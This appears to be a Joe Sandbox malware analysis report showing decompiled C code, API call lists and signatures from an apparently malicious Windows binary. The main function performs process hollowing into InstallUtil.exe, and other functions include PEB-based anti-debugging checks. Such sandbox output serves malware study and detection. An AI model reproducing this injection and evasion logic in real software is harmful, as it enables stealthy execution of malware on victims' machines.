                                                				asm("movlpd [esp+0x5c], xmm0");
                                                				asm("movlpd [esp+0x64], xmm0");
                                                				asm("movlpd [esp+0x6c], xmm0");
                                                				asm("movlpd [esp+0x74], xmm0");
                                                				asm("movlpd [esp+0x7c], xmm0");
                                                				asm("movlpd [esp+0x84], xmm0");
                                                				asm("movlpd [esp+0x8c], xmm0");
                                                				asm("movlpd [esp+0x94], xmm0");
                                                				asm("movaps [esp+0x40], xmm0");
                                                				E001A2200();
                                                				_t171 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t94 + 4)) + E001A2CB0() + 0x30)) + 4));
                                                				_v644 = _t171;
                                                				 *((intOrPtr*)( *_t171 + 4))(_t167, _t215, _t230);
                                                				_t97 = E001A53D0(_t166, _t215);
                                                				_t244 = _t243 + 4;
                                                				_t98 =  *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x30))))(0xa,  &_v648);
                                                				_t174 = _v648;
                                                				_t216 = _t98 & 0x0000ffff;
                                                				if(_t174 != 0) {
                                                					_t164 =  *((intOrPtr*)( *((intOrPtr*)( *_t174 + 8))))();
                                                					if(_t164 != 0) {
                                                						 *((intOrPtr*)( *_t164))(1);
                                                					}
                                                				}
                                                				E001A5CB0(_t231, _t216); // executed
                                                				E001A4600(_t231); // executed
                                                				E001A4CB0(); // executed
                                                				_t217 = GetModuleHandleW(L"kernel32.dll");
                                                				_t103 =  *0x1d5a9c; // 0x80
                                                				_v656 = _t217;
                                                				_v676 = _t103;
                                                				_t233 = GetModuleHandleW(L"ntdll.dll"); // executed
                                                				_t105 = L001A2420(_t166, _t217, "GetWindowsDirectoryW"); // executed
                                                				_v664 = _t105 + _t217;
                                                				_t107 = L001A2420(_t166, _t233, "ZwWriteVirtualMemory"); // executed
                                                				_t108 = _t107 + _t233;
                                                				_v668 = _t108;
                                                				__imp__GetConsoleWindow(); // executed
                                                				ShowWindow(_t108, 0); // executed
                                                				_t208 = "CreateProcessW";
                                                				_t110 = L001A2420(_t166, _t217, "CreateProcessW"); // executed
                                                				 *((intOrPtr*)(_t244 + 0x58)) = 0x44;
                                                				_v660 = _t110 + _t217;
                                                				_v664(_t244 + 0xa0, 0x104);
                                                				_t219 = _t244 + 0x9e;
                                                				do {
                                                					_t114 =  *(_t219 + 2);
                                                					_t219 = _t219 + 2;
                                                				} while (_t114 != 0);
                                                				 *(_t244 + 0x54) = 0;
                                                				_t118 = memcpy(_t219, L"\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe", 0x1a << 2);
                                                				_t245 = _t244 + 0xc;
                                                				if(CreateProcessW(_t118, 0, 0, 0, 0, 4, 0, 0,  &_v616, _t244 + 0x40) == 0) {
                                                					L17:
                                                					_pop(_t222);
                                                					_pop(_t235);
                                                					return E001A9545(_t119, _t166,  *(_t245 + 0x2ac) ^ _t245, _t208, _t222, _t235);
                                                				} else {
                                                					while(1) {
                                                						_t223 = _v660;
                                                						_t121 = L001A2420(_t166, _t223, "VirtualAllocEx"); // executed
                                                						_v684 = _t121 + _t223;
                                                						_t123 = VirtualAllocEx(0xffffffff, 0, 4, 0x1000, 4); // executed
                                                						_v676 = _t123;
                                                						 *_t123 = 0x10007; // executed
                                                						L001A2420(_t166, _t223, "GetThreadContext"); // executed
                                                						_t208 = "SetThreadContext";
                                                						_t125 = L001A2420(_t166, _t223, "SetThreadContext"); // executed
                                                						_v656 = _t125 + _t223;
                                                						_t119 = GetThreadContext( *(_t245 + 0x48), _v676); // executed
                                                						if(_t119 == 0) {
                                                							goto L17;
                                                						}
                                                						L001A2420(_t166, _t223, "ReadProcessMemory"); // executed
                                                						_t237 = _v676;
                                                						ReadProcessMemory( *(_t245 + 0x50), _t237->Ebx + 8,  &_v624, 4, 0); // executed
                                                						_t130 = _v680;
                                                						_t191 = _t130 + 0x1d5a94;
                                                						_v644 = _t191;
                                                						_v684 = VirtualAllocEx( *(_t245 + 0x50),  *_t191,  *(_t130 + "is program cannot be run in DOS mode.\r\r\n$"), 0x3000, 0x40);
                                                						_t132 = L001A2420(_t166, _t223, "TerminateProcess"); // executed
                                                						_v648 = _t132 + _t223;
                                                						NtWriteVirtualMemory( *(_t245 + 0x50), _v684, 0x1d5a60,  *(_v680 + "rogram cannot be run in DOS mode.\r\r\n$"), _t245 + 0x54);
                                                						_t213 = _v700;
                                                						if(_t213 != 0) {
                                                							if(0 <  *((intOrPtr*)(_v696 + 0x1d5a66))) {
                                                								_t238 = 0;
                                                								_t224 = 0;
                                                								do {
                                                									_t197 =  *0x1d5a9c; // 0x80
                                                									_t198 = _t197 + _t238;
                                                									_t69 = _t198 + 0x1d5b68; // 0x2c000
                                                									_t70 = _t198 + 0x1d5b6c; // 0x200
                                                									_t71 = _t198 + 0x1d5b64; // 0x2000
                                                									NtWriteVirtualMemory(_v656,  *_t71 + _t213,  *_t70 + 0x1d5a60,  *_t69, 0);
                                                									_t224 = _t224 + 1;
                                                									_t213 = _v716;
                                                									_t238 = _t238 + 0x28;
                                                								} while (_t224 < ( *( *((intOrPtr*)(_t245 + 0x18)) + 0x1d5a66) & 0x0000ffff));
                                                								_t223 = _v692;
                                                								_t237 = _v708;
                                                							}
                                                							NtWriteVirtualMemory(_v656, _t237->Ebx + 8, _v660, 4, 0);
                                                							_t237->Eax =  *((intOrPtr*)( *((intOrPtr*)(_t245 + 0x18)) + 0x1d5a88)) + _v716;
                                                							SetThreadContext(_v668, _t237);
                                                							_t208 = "ResumeThread";
                                                							L001A2420(_t166, _t223, "ResumeThread"); // executed
                                                							_t119 = ResumeThread(_v668); // executed
                                                							goto L17;
                                                						} else {
                                                							_v664(_v656, 5);
                                                							_v692(_t245 + 0xa4, 0x104);
                                                							_t226 =  &(_v616.dwFillAttribute) + 0xfffffffe;
                                                							do {
                                                								_t155 =  *(_t226 + 2);
                                                								_t226 = _t226 + 2;
                                                							} while (_t155 != 0);
                                                							_v652 = 0;
                                                							_push( &_v672);
                                                							_push( &_v648);
                                                							_push(0);
                                                							_push(0);
                                                							_push(4);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_t159 = memcpy(_t226, L"\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe", 0x1a << 2);
                                                							_t245 = _t245 + 0xc;
                                                							_push(_t159);
                                                							if(_v696() != 0) {
                                                								continue;
                                                							} else {
                                                								_pop(_t229);
                                                								_pop(_t240);
                                                								return E001A9545(_t160, _t166,  *(_t245 + 0x2a4) ^ _t245, _t213, _t229, _t240);
                                                							}
                                                						}
                                                						goto L18;
                                                					}
                                                					goto L17;
                                                				}
                                                				L18:
                                                			}

















































































                                                0x001a2660
                                                0x001a2666
                                                0x001a266c
                                                0x001a2673
                                                0x001a267a
                                                0x001a267f
                                                0x001a2685
                                                0x001a268b
                                                0x001a2691
                                                0x001a2697
                                                0x001a269d
                                                0x001a26a6
                                                0x001a26af
                                                0x001a26b8
                                                0x001a26bd
                                                0x001a26d3
                                                0x001a26d6
                                                0x001a26dc
                                                0x001a26e4
                                                0x001a26e9
                                                0x001a26f5
                                                0x001a26f7
                                                0x001a26fb
                                                0x001a2700
                                                0x001a2707
                                                0x001a270b
                                                0x001a2713
                                                0x001a2713
                                                0x001a270b
                                                0x001a2718
                                                0x001a271f
                                                0x001a2724
                                                0x001a2736
                                                0x001a2738
                                                0x001a2742
                                                0x001a2746
                                                0x001a2753
                                                0x001a2755
                                                0x001a2763
                                                0x001a2767
                                                0x001a276c
                                                0x001a2770
                                                0x001a2774
                                                0x001a277b
                                                0x001a2781
                                                0x001a2788
                                                0x001a278f
                                                0x001a2797
                                                0x001a27a8
                                                0x001a27b3
                                                0x001a27b6
                                                0x001a27b6
                                                0x001a27ba
                                                0x001a27bd
                                                0x001a27c6
                                                0x001a27f3
                                                0x001a27f3
                                                0x001a27fc
                                                0x001a2a2a
                                                0x001a2a31
                                                0x001a2a32
                                                0x001a2a3d
                                                0x001a2802
                                                0x001a2802
                                                0x001a2802
                                                0x001a280d
                                                0x001a2821
                                                0x001a2825
                                                0x001a282c
                                                0x001a2832
                                                0x001a2838
                                                0x001a283d
                                                0x001a2847
                                                0x001a2856
                                                0x001a285a
                                                0x001a285e
                                                0x00000000
                                                0x00000000
                                                0x001a286b
                                                0x001a2870
                                                0x001a288d
                                                0x001a288f
                                                0x001a289a
                                                0x001a28a6
                                                0x001a28b9
                                                0x001a28bf
                                                0x001a28ca
                                                0x001a28e6
                                                0x001a28ea
                                                0x001a28f0
                                                0x001a298d
                                                0x001a298f
                                                0x001a2991
                                                0x001a2993
                                                0x001a2993
                                                0x001a2999
                                                0x001a299d
                                                0x001a29a3
                                                0x001a29af
                                                0x001a29bc
                                                0x001a29c4
                                                0x001a29c5
                                                0x001a29c9
                                                0x001a29d3
                                                0x001a29d7
                                                0x001a29db
                                                0x001a29db
                                                0x001a29f5
                                                0x001a2a08
                                                0x001a2a12
                                                0x001a2a16
                                                0x001a2a1d
                                                0x001a2a28
                                                0x00000000
                                                0x001a28f6
                                                0x001a28fc
                                                0x001a290d
                                                0x001a2918
                                                0x001a2920
                                                0x001a2920
                                                0x001a2924
                                                0x001a2927
                                                0x001a2930
                                                0x001a2938
                                                0x001a2942
                                                0x001a2943
                                                0x001a2945
                                                0x001a2947
                                                0x001a2949
                                                0x001a294b
                                                0x001a294d
                                                0x001a294f
                                                0x001a295d
                                                0x001a295d
                                                0x001a295f
                                                0x001a2966
                                                0x00000000
                                                0x001a296c
                                                0x001a296c
                                                0x001a296d
                                                0x001a297f
                                                0x001a297f
                                                0x001a2966
                                                0x00000000
                                                0x001a28f0
                                                0x00000000
                                                0x001a2802
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 001A53D0: std::_Lockit::_Lockit.LIBCPMT ref: 001A53FC
                                                  • Part of subcall function 001A53D0: std::_Lockit::_Lockit.LIBCPMT ref: 001A5419
                                                  • Part of subcall function 001A53D0: std::_Lockit::~_Lockit.LIBCPMT ref: 001A543D
                                                  • Part of subcall function 001A53D0: std::_Lockit::~_Lockit.LIBCPMT ref: 001A5468
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 001A2734
                                                • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 001A274A
                                                • GetConsoleWindow.KERNELBASE(00000000), ref: 001A2774
                                                • ShowWindow.USER32(00000000), ref: 001A277B
                                                • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 001A27F6
                                                • VirtualAllocEx.KERNELBASE(000000FF,00000000,00000004,00001000,00000004), ref: 001A2825
                                                • GetThreadContext.KERNELBASE(?,?), ref: 001A285A
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 001A288D
                                                • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 001A28B0
                                                • NtWriteVirtualMemory.NTDLL(?,?,001D5A60,?,00000000), ref: 001A28E6
                                                • NtWriteVirtualMemory.NTDLL(?,00002000,-001D5860,0002C000,00000000), ref: 001A29BC
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 001A29F5
                                                • SetThreadContext.KERNELBASE(?,?), ref: 001A2A12
                                                • ResumeThread.KERNELBASE(?), ref: 001A2A28
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: Virtual$LockitMemorystd::_$ThreadWrite$AllocContextHandleLockit::_Lockit::~_ModuleProcessWindow$ConsoleCreateReadResumeShow
                                                • String ID: CreateProcessW$D$GetThreadContext$GetWindowsDirectoryW$H' $ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAllocEx$ZwWriteVirtualMemory$\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$kernel32.dll$ntdll.dll$take it everywhere
                                                • API String ID: 1567419398-101210817
                                                • Opcode ID: fb58cc3878939bfd89a47d579b3b97e37a7bd993e5f2c68bc31233e7edf5a191
                                                • Instruction ID: 91c6c1f43943199b4add74281eb49cebbef083809d001fb29d93024c161cfd41
                                                • Opcode Fuzzy Hash: fb58cc3878939bfd89a47d579b3b97e37a7bd993e5f2c68bc31233e7edf5a191
                                                • Instruction Fuzzy Hash: F7B18A756043009BC720DF68CC45B6ABBE6BFDA704F144A1EF6859B291DBB0E801CB96
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001AA1E7() {
                                                				_Unknown_base(*)()* _t1;
                                                
                                                				_t1 = SetUnhandledExceptionFilter(E001AA1F3); // executed
                                                				return _t1;
                                                			}




                                                0x001aa1ec
                                                0x001aa1f2

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_0000A1F3,001A966C), ref: 001AA1EC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 1e36cec10ae690f6aa52bdfe4a3c4023c6f11b9b59e830874da1189f0c1b19d1
                                                • Instruction ID: 31466d13b494279191610320f89f5e0cd8ac9c1784bfde5e56f81c96e3801ff2
                                                • Opcode Fuzzy Hash: 1e36cec10ae690f6aa52bdfe4a3c4023c6f11b9b59e830874da1189f0c1b19d1
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001BF51B(void* __ecx) {
                                                				char _v8;
                                                				intOrPtr _t7;
                                                				char _t13;
                                                
                                                				_t13 = 0;
                                                				_v8 = 0;
                                                				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                				_t16 =  *((intOrPtr*)(_t7 + 8));
                                                				if( *((intOrPtr*)(_t7 + 8)) < 0) {
                                                					L2:
                                                					_t13 = 1;
                                                				} else {
                                                					E001B8A1F(_t16,  &_v8); // executed
                                                					if(_v8 != 1) {
                                                						goto L2;
                                                					}
                                                				}
                                                				return _t13;
                                                			}






                                                0x001bf528
                                                0x001bf52a
                                                0x001bf52d
                                                0x001bf530
                                                0x001bf533
                                                0x001bf544
                                                0x001bf546
                                                0x001bf535
                                                0x001bf539
                                                0x001bf542
                                                0x00000000
                                                0x00000000
                                                0x001bf542
                                                0x001bf54b

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc74820fb1b97d61900c022ac5f00d40ea5610daf8fcc634aee477727c61efaa
                                                • Instruction ID: 7efd4403a92f0a0288a7a3099062b740e6fc601ce4bfa4a613e3274a79f4579e
                                                • Opcode Fuzzy Hash: dc74820fb1b97d61900c022ac5f00d40ea5610daf8fcc634aee477727c61efaa
                                                • Instruction Fuzzy Hash: 94E0EC72A112A8EBCB25DF99D94498AF3ECFB49B50B5544AAF511E3111C770DE01C7D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001B3E39(void* __ecx, void* __eflags) {
                                                				void* _t3;
                                                
                                                				_t3 = E001BF51B(__ecx); // executed
                                                				if(_t3 == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}




                                                0x001b3e39
                                                0x001b3e41
                                                0x001b3e5a
                                                0x001b3e55
                                                0x001b3e57
                                                0x001b3e57

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 84f167cc2a55593233b99851ee93526c1d38135f9da0d65acc0b3a944d5bd5d5
                                                • Instruction ID: 4e916999d9d947215f2b8fe0fba09beaa8eea3a3091a3dbf462e1ff5beffb251
                                                • Opcode Fuzzy Hash: 84f167cc2a55593233b99851ee93526c1d38135f9da0d65acc0b3a944d5bd5d5
                                                • Instruction Fuzzy Hash: 69C08C3520098466CE298910C2713E83354A3A6F82FC0048DC82A0B682D71EFE82D710
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 59 1b88d1-1b88dd 60 1b896f-1b8972 59->60 61 1b8978 60->61 62 1b88e2-1b88f3 60->62 63 1b897a-1b897e 61->63 64 1b8900-1b8919 LoadLibraryExW 62->64 65 1b88f5-1b88f8 62->65 66 1b891b-1b8924 GetLastError 64->66 67 1b897f-1b898f 64->67 68 1b8998-1b899a 65->68 69 1b88fe 65->69 71 1b895d-1b896a 66->71 72 1b8926-1b8938 call 1b6358 66->72 67->68 73 1b8991-1b8992 FreeLibrary 67->73 68->63 70 1b896c 69->70 70->60 71->70 72->71 76 1b893a-1b894c call 1b6358 72->76 73->68 76->71 79 1b894e-1b895b LoadLibraryExW 76->79 79->67 79->71
                                                C-Code - Quality: 100%
                                                			E001B88D1(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                                				signed int _v8;
                                                				void* _t17;
                                                				void* _t20;
                                                				void* _t22;
                                                				WCHAR* _t26;
                                                				signed int _t29;
                                                				void** _t30;
                                                				signed int* _t35;
                                                				void* _t38;
                                                				void* _t40;
                                                
                                                				_t35 = _a4;
                                                				while(_t35 != _a8) {
                                                					_t29 =  *_t35;
                                                					_v8 = _t29;
                                                					_t38 =  *(0x203380 + _t29 * 4);
                                                					if(_t38 == 0) {
                                                						_t26 =  *(0x1cab60 + _t29 * 4);
                                                						_t17 = LoadLibraryExW(_t26, 0, 0x800); // executed
                                                						_t38 = _t17;
                                                						if(_t38 != 0) {
                                                							L14:
                                                							_t30 = 0x203380 + _v8 * 4;
                                                							 *_t30 = _t38;
                                                							if( *_t30 != 0) {
                                                								FreeLibrary(_t38);
                                                							}
                                                							L16:
                                                							_t20 = _t38;
                                                							L13:
                                                							return _t20;
                                                						}
                                                						_t22 = GetLastError();
                                                						if(_t22 != 0x57) {
                                                							L9:
                                                							 *(0x203380 + _v8 * 4) = _t22 | 0xffffffff;
                                                							L10:
                                                							_t35 =  &(_t35[1]);
                                                							continue;
                                                						}
                                                						_t22 = E001B6358(_t26, L"api-ms-", 7);
                                                						_t40 = _t40 + 0xc;
                                                						if(_t22 == 0) {
                                                							goto L9;
                                                						}
                                                						_t22 = E001B6358(_t26, L"ext-ms-", 7);
                                                						_t40 = _t40 + 0xc;
                                                						if(_t22 == 0) {
                                                							goto L9;
                                                						}
                                                						_t22 = LoadLibraryExW(_t26, _t38, _t38);
                                                						_t38 = _t22;
                                                						if(_t38 != 0) {
                                                							goto L14;
                                                						}
                                                						goto L9;
                                                					}
                                                					if(_t38 != 0xffffffff) {
                                                						goto L16;
                                                					}
                                                					goto L10;
                                                				}
                                                				_t20 = 0;
                                                				goto L13;
                                                			}













                                                0x001b88da
                                                0x001b896f
                                                0x001b88e2
                                                0x001b88e4
                                                0x001b88ee
                                                0x001b88f3
                                                0x001b8900
                                                0x001b890f
                                                0x001b8915
                                                0x001b8919
                                                0x001b897f
                                                0x001b8984
                                                0x001b898b
                                                0x001b898f
                                                0x001b8992
                                                0x001b8992
                                                0x001b8998
                                                0x001b8998
                                                0x001b897a
                                                0x001b897e
                                                0x001b897e
                                                0x001b891b
                                                0x001b8924
                                                0x001b895d
                                                0x001b896a
                                                0x001b896c
                                                0x001b896c
                                                0x00000000
                                                0x001b896c
                                                0x001b892e
                                                0x001b8933
                                                0x001b8938
                                                0x00000000
                                                0x00000000
                                                0x001b8942
                                                0x001b8947
                                                0x001b894c
                                                0x00000000
                                                0x00000000
                                                0x001b8951
                                                0x001b8957
                                                0x001b895b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b895b
                                                0x001b88f8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001b88fe
                                                0x001b8978
                                                0x00000000

                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,8121A627,?,001B89DE,?,?,00000000,00000000), ref: 001B8992
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3664257935-537541572
                                                • Opcode ID: 4c46d7ee5e0e98df026758123ee8f87dae0384bf64d02c46d645f8188468394d
                                                • Instruction ID: 6e5be4dd2fae3973e6a103ae42174d71ddffc1f857126fdca37de07be6942f44
                                                • Opcode Fuzzy Hash: 4c46d7ee5e0e98df026758123ee8f87dae0384bf64d02c46d645f8188468394d
                                                • Instruction Fuzzy Hash: 2921B735A05311ABCF25AB24EC45EEA376C9F92FA8F250164F915A72D1DF70ED00C6E1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 76%
                                                			E001A7B14() {
                                                				intOrPtr* _t36;
                                                				void* _t41;
                                                				void* _t58;
                                                				intOrPtr* _t64;
                                                				void* _t71;
                                                				void* _t72;
                                                				void* _t74;
                                                				intOrPtr* _t75;
                                                				intOrPtr* _t76;
                                                				void* _t78;
                                                
                                                				_push(8);
                                                				E001A9A79(0x1c68ac, _t58, _t72, _t74);
                                                				E001A612A(_t78 - 0x14, 0);
                                                				_t75 =  *0x2028bc; // 0xb13290
                                                				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
                                                				 *((intOrPtr*)(_t78 - 0x10)) = _t75;
                                                				_t36 = E001A1B80( *((intOrPtr*)(_t78 + 8)), E001A1AA0(_t58, 0x202720, _t71, _t72));
                                                				_t73 = _t36;
                                                				if(_t36 != 0) {
                                                					L5:
                                                					E001A6182(_t78 - 0x14);
                                                					return E001A9A56(_t73);
                                                				} else {
                                                					if(_t75 == 0) {
                                                						_push( *((intOrPtr*)(_t78 + 8)));
                                                						_push(_t78 - 0x10); // executed
                                                						_t41 = E001A7F84(_t58, _t73, _t75, __eflags); // executed
                                                						_pop(_t64);
                                                						__eflags = _t41 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							E001A1910();
                                                							asm("int3");
                                                							_push(8);
                                                							E001A9A79(0x1c68ea, _t58, _t73, _t75);
                                                							_t76 = _t64;
                                                							 *((intOrPtr*)(_t78 - 0x14)) = _t76;
                                                							 *((intOrPtr*)(_t78 - 0x10)) = 0;
                                                							__eflags =  *((intOrPtr*)(_t78 + 0x10));
                                                							if( *((intOrPtr*)(_t78 + 0x10)) != 0) {
                                                								 *_t76 = 0x1c7484;
                                                								 *((intOrPtr*)(_t76 + 0x10)) = 0;
                                                								 *((intOrPtr*)(_t76 + 0x30)) = 0;
                                                								 *((intOrPtr*)(_t76 + 0x34)) = 0;
                                                								 *((intOrPtr*)(_t76 + 0x38)) = 0;
                                                								 *((intOrPtr*)(_t76 + 8)) = 0x1c7478;
                                                								 *(_t78 - 4) = 0;
                                                								 *((intOrPtr*)(_t78 - 0x10)) = 1;
                                                							}
                                                							 *((intOrPtr*)(_t76 +  *((intOrPtr*)( *_t76 + 4)))) = 0x1c7480;
                                                							_t28 =  *((intOrPtr*)( *_t76 + 4)) - 8; // -8
                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 4)) + _t76 - 4)) = _t28;
                                                							__eflags =  *((intOrPtr*)( *_t76 + 4)) + _t76;
                                                							E001A8284(_t58,  *((intOrPtr*)( *_t76 + 4)) + _t76, _t73,  *((intOrPtr*)( *_t76 + 4)) + _t76,  *((intOrPtr*)(_t78 + 8)),  *((intOrPtr*)(_t78 + 0xc)));
                                                							return E001A9A56(_t76);
                                                						} else {
                                                							_t73 =  *((intOrPtr*)(_t78 - 0x10));
                                                							 *((intOrPtr*)(_t78 - 0x10)) = _t73;
                                                							 *(_t78 - 4) = 1;
                                                							E001A644B(__eflags, _t73);
                                                							 *0x1c7144();
                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 4))))();
                                                							 *0x2028bc = _t73;
                                                							goto L5;
                                                						}
                                                					} else {
                                                						_t73 = _t75;
                                                						goto L5;
                                                					}
                                                				}
                                                			}













                                                0x001a7b14
                                                0x001a7b1b
                                                0x001a7b25
                                                0x001a7b2a
                                                0x001a7b35
                                                0x001a7b39
                                                0x001a7b45
                                                0x001a7b4a
                                                0x001a7b4e
                                                0x001a7b93
                                                0x001a7b96
                                                0x001a7ba2
                                                0x001a7b50
                                                0x001a7b52
                                                0x001a7b58
                                                0x001a7b5e
                                                0x001a7b5f
                                                0x001a7b65
                                                0x001a7b66
                                                0x001a7b69
                                                0x001a7ba3
                                                0x001a7ba8
                                                0x001a7ba9
                                                0x001a7bb0
                                                0x001a7bb5
                                                0x001a7bb7
                                                0x001a7bbc
                                                0x001a7bbf
                                                0x001a7bc2
                                                0x001a7bc4
                                                0x001a7bca
                                                0x001a7bcd
                                                0x001a7bd0
                                                0x001a7bd3
                                                0x001a7bd6
                                                0x001a7bdd
                                                0x001a7be0
                                                0x001a7be0
                                                0x001a7bf2
                                                0x001a7bfe
                                                0x001a7c01
                                                0x001a7c0a
                                                0x001a7c0c
                                                0x001a7c18
                                                0x001a7b6b
                                                0x001a7b6b
                                                0x001a7b6e
                                                0x001a7b72
                                                0x001a7b76
                                                0x001a7b83
                                                0x001a7b8b
                                                0x001a7b8d
                                                0x00000000
                                                0x001a7b8d
                                                0x001a7b54
                                                0x001a7b54
                                                0x00000000
                                                0x001a7b54
                                                0x001a7b52

                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 001A7B1B
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A7B25
                                                  • Part of subcall function 001A1AA0: std::_Lockit::_Lockit.LIBCPMT ref: 001A1ABC
                                                  • Part of subcall function 001A1AA0: std::_Lockit::~_Lockit.LIBCPMT ref: 001A1AD9
                                                • ctype.LIBCPMT ref: 001A7B5F
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A7B96
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
                                                • String ID: '
